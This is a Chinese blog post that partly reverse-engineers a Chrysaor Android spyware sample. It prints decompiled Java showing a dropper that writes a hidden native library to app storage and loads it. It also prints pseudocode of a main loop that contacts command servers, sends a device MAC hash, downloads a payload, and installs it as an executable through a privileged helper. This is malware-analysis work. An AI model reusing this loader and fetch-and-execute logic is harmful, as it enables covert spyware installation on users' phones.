android malware

最新推荐文章于 2021-11-02 08:34:00 发布
最新推荐文章于 2021-11-02 08:34:00 发布
阅读量1k 收藏
点赞数
分类专栏: Android逆向 逆向 文章标签: android malware
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/77490608
版权

来源:
https://github.com/fs0c131y/Android-Malwares/tree/c897dff1796c9cb7f19104e9ce3546d54cd55a45/Chrysaor/

3474625e63d0893fc8f83034e835472d95195254e1e4bdf99153b7c74eb44d86

用JEB看是这样一个结构
先看manifest发现用到了超多权限,然后入口是这里
这里写图片描述
这里写图片描述
反编译得到其Java代码

package com.network.android;

import android.app.Activity;
import android.os.Bundle;
import java.io.ByteArrayOutputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;

public class NetworkMain extends Activity {
    public NetworkMain() {
        super();
    }

    protected void onCreate(Bundle arg8) {
        super.onCreate(arg8);
        String v2 = "/data/data/com.network.android/libsgn.so";
        try {
            InputStream v1 = this.getResources().getAssets().open("libsgn.so");
            byte[] v0 = new byte[v1.available()];
            v1.read(v0);
            ByteArrayOutputStream v3 = new ByteArrayOutputStream();
            v3.write(v0);
            v3.close();
            v1.close();
            FileOutputStream v4 = new FileOutputStream(v2);
            v3.writeTo(((OutputStream)v4));
            ((OutputStream)v4).close();
            System.load(v2);
        }
        catch(Throwable v5) {
        }
        catch(Exception v5_1) {
        }
        catch(IOException v5_2) {
        }

        this.finish();
    }
}

发现并没有界面,直接将assets目录下的.so写入android的这个路径
/data/data/com.network.android/libsgn.so,然后用

Syste.load()

加载.so,然后就得转战IDA了。
然而并不会分析,只能看一堆strings
这里写图片描述
哦对了可以看一下JNI_onLoad()
这里写图片描述
发现它调用了fork()然后main()!
看到main的代码很牛啊,然而很多不懂的函数

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  void *v3; // r0@1
  int v4; // r5@2
  int v5; // r7@6
  void *v6; // r5@7
  char *v7; // r0@12
  const char *v8; // r2@12
  const char *v9; // r3@12
  char *v10; // [sp+0h] [bp-4A0h]@0
  char *v11; // [sp+4h] [bp-49Ch]@0
  int v12; // [sp+Ch] [bp-494h]@7
  char *v13; // [sp+10h] [bp-490h]@7
  int v14; // [sp+1Ch] [bp-484h]@1
  int v15; // [sp+20h] [bp-480h]@1
  void *ptr; // [sp+24h] [bp-47Ch]@1
  int v17; // [sp+28h] [bp-478h]@7
  char v18; // [sp+2Ch] [bp-474h]@1
  char v19; // [sp+3Ch] [bp-464h]@1
  char v20; // [sp+60h] [bp-440h]@1
  char s; // [sp+84h] [bp-41Ch]@1
  int v22; // [sp+484h] [bp-1Ch]@1

  v14 = 0;
  v15 = 0;
  v22 = _stack_chk_guard;
  ptr = 0;
  memset(&s, 0, 0x400u);
  memset(&v19, 0, 0x21u);
  memset(&v18, 0, 0xDu);
  v3 = memset(&v20, 0, 0x21u);
  handle_signals(v3);
  g_sleep_time_in_seconds = 30;
  sleep(0x1Eu);
  geteuid();
  while ( 1 )
  {
    v4 = 0;
    if ( socket_connect(&v14, SERVERS, unk_600C) == 1 )
    {
      get_random_hexlified_md5(&v19);
      get_mac_address(&v18);
      get_hexlified_md5(&v18, &v20, 12);
      if ( http_send_request_with_get(&v20, &v19, SERVERS, v14) == 1 && http_receive_payload(v14, &ptr, &v15) == 1 )
      {
        socket_disconnect(&v14);
        if ( socket_connect(&v14, SERVERS, unk_600C) == 1 )
        {
          v5 = v15;
          v4 = 1;
          if ( v15 > 0 )
          {
            v12 = v14;
            v6 = ptr;
            v13 = SERVERS;
            v17 = 0;
            if ( file_exists("/system/csk", &v17) != 1 )
              goto LABEL_17;
            if ( v17 )
            {
              if ( write_buffer_as_executable(v6, v5, "/data/data/com.network.android/.coldboot_init") != 1
                || system("/system/csk \"cat /data/data/com.network.android/.coldboot_init > /mnt/obb/.coldboot_init\"") == -1
                || system("/system/csk \"chmod 711 /mnt/obb/.coldboot_init\"") == -1 )
              {
LABEL_17:
                v4 = 0;
                goto LABEL_18;
              }
              unlink("/data/data/com.network.android/.coldboot_init");
              v7 = &s;
              v8 = "%s";
              v9 = "/mnt/obb/.coldboot_init";
            }
            else
            {
              if ( write_buffer_as_executable(v6, v5, "/data/data/com.network.android/.coldboot_init") != 1 )
                goto LABEL_17;
              v7 = &s;
              v8 = "%s";
              v9 = "/data/data/com.network.android/.coldboot_init";
            }
            if ( snprintf(v7, 0x3FFu, v8, v9, v10, v11) <= 0 )
              goto LABEL_17;
            v10 = &v19;
            v11 = v13;
            v4 = sub_1CF4(v12, &s, v17, &v20);
            if ( v4 != 1 )
              goto LABEL_17;
          }
        }
      }
    }
LABEL_18:
    if ( ptr )
    {
      free(ptr);
      ptr = 0;
    }
    socket_disconnect(&v14);
    if ( v4 == 1 )
      pthread_exit(0);
    sleep(g_sleep_time_in_seconds);
  }
}
caiqiiqi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Android平台各类恶意软件及病毒概览
黄沙百战穿金甲,不破楼兰终不还。
11-08 2420
随着移动互联网的发展,作为当今最大的移动操作系统之一,Android已经被越来越多的用户所使用。然而由于市场自身制度的不完善以及弊端,Android市场内应用的质量低下以及垃圾软件、恶意软件的泛滥为用户带来了非常大的危害。用户面临着极大的移动终端安全问题,内置病毒、信息窃取、吸费等威胁层出不穷。 本文将Android平台上的各类恶意软件和病毒分为7大类进行概述,以帮助用户在实际使用过程中进行
Android木马分析实验,Android木马简介与分析
weixin_42500130的博客
05-26 1324
本文介绍基于Android的手机恶意软件,是一个基础性的介绍,给新入门的人提供一个分析和工具指引。要分析的木马是一个2013年的syssecApp.apk,这个木马的分析能对Android恶意软件有个大概了解。基础:1 –Android应用基础Android是google开发基于Linux内核的开源的手机操作系统,应用程序使用JAVA语言编写并转换成了Dalvik虚拟机,而虚拟机 则提供了一个抽象...
AndroidMalware_2020:2020年出现的流行Android恶意软件
03-21
Android恶意软件_2020 2020年流行的Android威胁 一月 静音广告软件75fd1658cd6cb56f9194dbb1aabadd64 80abde70e5f4d4dc7ace31586097e026 1250f1296c0e92112d554960d4f99710 新的Anubis样本d4be1208d35bc8badb0fa97a36a28c8c d936dad9349ebe2daf8f69427f414fdc Coybot巴西银行家058de750a4a2402104e4bd22179f8432050c98ea88b5bfec2f065f6dc2a950f9 bf20ad4fcc9fb6910e481a199bb7da649bcd29dd91846692875a3a2c737b83d9 面包2273af79cae07c3d0d07eb4d3f30d60c 350
ANDROID MALWARE
05-25
This book is based on our years-long research conducted to systematically analyze emerging Android malware. Some of our earlier research results and findings were reported in an IEEE conference paper entitled Dissecting Android Malware: Characterization and Evolution, which was presented at the IEEE Symposium on Security and Privacy (often mentioned as Oakland conference in the security community) in May, 2012 [77]. During and after the conference, we were pleased to receive and hear inquiries from colleagues with encouraging comments on the systematization of knowledge work that has been conducted in our conference paper. Partially because of that, we are motivated to expand our work and hope such efforts will be of service to the security and privacy community. Further, as part of that, we have released corresponding malware dataset for our study under the name Android Malware Genome Projectto the community. With that, we want to take this opportunity to thank our collaborators, Dongyan Xu, Peng Ning, Xinyuan Wang, Shihong Zou, and others, whose valuable insights and comments greatly enriched our work. The authors are also grateful to colleagues in the Cyber Defense Lab at NC State University, especially Tyler Bletsch, Zhi Wang, Michael Grace, Deepa Srinivasan, Minh Q. Tran, Chiachih Wu, Wu Zhou, and Kunal Patel. Special thanks also go to Susan Lagerstrom-Fife and our publisher for their great help and patience! This research was supported in part by the US National Science Foundation (NSF) under Grants 0855297, 0855036, 0910767, and 0952640. Any opinions, findings, and conclusions or recommendations expressed in this material are those of the authors and should not be interpreted as necessarily representing the official policies or endorsements, either expressed or implied, for the NSF. 1 Introduction ........................................ 1 2 A Survey of Android Malware........................... 3 2.1 Malware Dataset . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 2.2 Malware Characterization . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 2.2.1 Malware Installation . . . . . . . . . . . . . . . . . . . . . . . . . . 5 2.2.2 Activation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12 2.2.3 Malicious Payloads . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 2.2.4 Permission Usage . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18 3 Case Studies ........................................ 21 3.1 Malware I: Plankton . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21 3.1.1 Phoning Home . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21 3.1.2 Dynamic Execution . . . . . . . . . . . . . . . . . . . . . . . . . . . 22 3.2 Malware II: DroidKungFu . . . . . . . . . . . . . . . . . . . . . . . . . . . 23 3.2.1 Root Exploits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24 3.2.2 Command and Control (C&C) Servers . . . . . . . . . . . . . 24 3.2.3 Payloads . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26 3.2.4 Obfuscation, JNI, and Others . . . . . . . . . . . . . . . . . . . . 26 3.3 Malware III: AnserverBot. . . . . . . . . . . . . . . . . . . . . . . . . . . . 26 3.3.1 Anti-Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27 3.3.2 Command and Control (C&C) Servers . . . . . . . . . . . . . 28 4 Discussion.......................................... 31 5 Additional Reading................................... 33 5.1 Books . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33 5.1.1 Malware Detection and Defense . . . . . . . . . . . . . . . . . . 33 5.1.2 Smartphone (Apps) Security. . . . . . . . . . . . . . . . . . . . . 34 5.2 Conference and Workshop Proceedings . . . . . . . . . . . . . . . . . . 34 ix 6 Summary........................................... 37 References............................................ 39 Index ................................................ 43
Android Malware Detection with Seq2vec
m0_63642362的博客
11-02 932
Android Malware Detection with Seq2vec 基于Seq2vec的安卓恶意软件检测,数据集取自CICMalDroid 2020,并进行了特征提取。 引言 最近在做Android恶意软件静态检测的研究,此前发布了两个版本,都对Android恶意软件有很高的识别率,现在尝试用Seq2vec的方法进行Android恶意软件检测。我尝试使用了Bi-LSTM、CNN,发现,Bi-LSTM实在训练太慢,而CNN网络不但训练快,而且训练集上准确度可以达到97%以上,验证集以及测试集准确度都
安卓恶意软件分析文献梳理2017-Android Malware Analysis-wcventure
wcventure的博客
01-21 2745
This document collects papers that are related with Android Malware analysis.
安卓恶意代码数据集(Android Malware and Benign apps)整理
qysh123的专栏
11-18 6803
因为最近想做一些简单的实验,而自己之前收集的数据找不着了,所以又看了看别人的推荐,发现ResearchGate上这个讨论里有些回答还是总结得很好的: https://www.researchgate.net/post/Where_can_I_get_Android_Malware_Samples 例如有一位朋友总结到: Nowadays, we can find other projects...
Android Malware Detection
weixin_44345870的博客
05-06 385
基于机器学习和深度神经网络的安卓恶意软件静态分析与检测,主要是针对AndroidManifest.xml文件进行分析。Android Malware Detection
Android Malware and Analysis (android恶意软件分析)
03-07
Android Malware and Analysis (android恶意软件分析),最新版的安卓系统hacking技术 学习安卓系统级黑客必备!强烈推荐!
Android恶意代码分析
12-28
通过对本书的阅读,了解一定的相关分析能力,对于Android的开发会有一定的帮助
CICFlowMeter:CICFlowmeter-V4.0(以前称为ISCXFlowMeter)是用于异常检测的以太网流量双流生成器和分析器,已用于许多网络安全数据集中,例如Android Adware-General Malware数据集(CICAAGM2017),IPSIDS数据集(CICIDS2017), Android恶意软件数据集(CICAndMal2017)和分布式拒绝服务(CICDDoS2019)
05-13
安装jnetpcap本地仓库 对于linux,sudo是先决条件 //linux :at the pathtoproject/jnetpcap/linux/jnetpcap-1.4.r1425 //windows: at the pathtoproject/jnetpcap/win/jnetpcap-1.4.r1425 mvn install:install-file -Dfile=jnetpcap.jar -DgroupId=org.jnetpcap -DartifactId=jnetpcap -Dversion=1.4.1 -Dpackaging=jar 跑步 IntelliJ IDEA 在IDE中打开终端 //linux: $ sudo bash $ ./gradlew execute //windows: $ gradlew execute 蚀 用sudo运行eclipse 1
《移动广告软件与移动恶意软件分析》白皮书
05-29
“移动广告软件”与“移动恶意软件”是过去几年来在安卓平台上一直存在的两大移动安全威胁,它们通常出现在谷歌电子市场(Google Play)和第三方应用商店里的应用程序中。为了更好的揭示和分析这些基于安卓平台的移动威胁,从而为移动设备用户提供及时有效的安全警示,赛门铁克于近日发布了《移动广告软件与移动恶意软件分析》白皮书。
Android malware样本SLocker Mobile Ransomware
公众号shadow sock7
09-03 1237
样本下载: http://appscan.io/app-report.html?id=d72ca5ca1e7dc6431c041bfc6d7e3f9bfa39959c 分析: http://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry
Android Malware Genome Project
weixin_30855761的博客
05-24 392
共享Android平台恶意程序样本和分析结果,致力于开发出更好的探测工具。 北卡州立大学计算机科学系的两位研究人员Yajin Zhou和Xuxian Jiang发起了Android Malware Genome Project,共享Android平台恶意程序样本和分析结果,致力于开发出更好的探测工具。 研究人员至今共收集了1260个Android恶意代码样本,包含了49种不同恶意程序家族...
恶意代码分析相关工具&漏洞挖掘相关工具
m0_37442062的博客
06-06 3102
本文转载自恶意代码分析相关工具&漏洞挖掘相关工具 目录 0x01 恶意代码分析相关工具 0x02 扫描恶意代码及分析工具 0x03 Office文件相关恶意样本分析资料 0x04 PDF文件分析网站 0x05 AdobeFlash/SWF 文件分析 0x06 Android逆向相关 0x07 安卓漏洞及分析报告提供博客 0x08 漏洞挖掘相关工具 #General/Ba...
android恶意软件流量,基于流量分析的安卓恶意软件检测
weixin_39970369的博客
05-30 683
基于流量分析的安卓恶意软件检测随着智能手机行业的发展,人们在日常的工作学习生活中越来越离不开智能手机。Android系统作为流行度最高的智能手机系统之一,其安全性正受到越来越多恶意攻击者和安全研究者的关注。根据Zhou、Sarma和Yerima等人各自的研究,超过93%的Android恶意软件需要访问网络才能完成攻击,使用网络流量特征检测Android恶意软件具有可行性。近年来,该领域已有了较多研...
Toward a more dependable hybrid analysis of android malware using aspect-oriented programming
u013428193的博客
07-05 195
关键字:Android恶意软件  混合分析  面向编程论文来源:2018  computer &amp; security论文简介:文中提出AspectDroid,一种离线应用程序级别的混合分析系统,旨在调查Android应用程序中出现的可能不想要的Acitivities。利用静态字节码检测将分析流程编辑到现有应用程序中,以提供有效的数据流分析,检测资源滥用和可疑行为分析,同时动态监控运行。与以往...
安卓恶意软件检测
iMark
08-11 4971
找数据集发现了安卓恶意软件检测这个方向 就找到了 看了下也不是很新 但是近几年发文章的人挺多 就这个了 反正也找不到我写啥 这是几个安卓恶意软件数据集 入手 先看几篇中文论文 别人怎么做的 前两章讲恶意软件问题啥的先不管; 第三章写恶意软件数据集 一类是恶意样本共享网站 二类是具有家族信息的常用数据集 这些数据集干嘛的有点不懂 分类太多了 跟我论文相关的数据集应该是包含特征值和标签的数据集 这样适合随机森林机器学习。 第四章 基于特征码的恶意软件检测 基于特征码的恶意软件检测方法基本原理是利用每个软件
关于addJavascriptInterface方法
公众号shadow sock7
09-30 8672
WebView的RCE问题 参考: https://developer.android.com/reference/android/os/Build.VERSION_CODES#JELLY_BEAN 这里的最后一行的意思是: 对于targetSdkVersion为Android 4.2(API 17)及以上的app,在应用中想要使用js调用某方法,那么这个方法必须使用@JavascriptInt...
frida初体验
公众号shadow sock7
07-02 5463
在看apk逆向的题时,看到这个writeup,它谈到可以用frida来动态插桩,使用Frida你能够在包括安卓在内的许多平台上使用JavaScript来 hook 代码。 参考: http://www.jianshu.com/p/ca8381d3e094 Frida是一款基于python + javascript 的hook框架,通杀android\ios\linux\win\osx等各平台

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值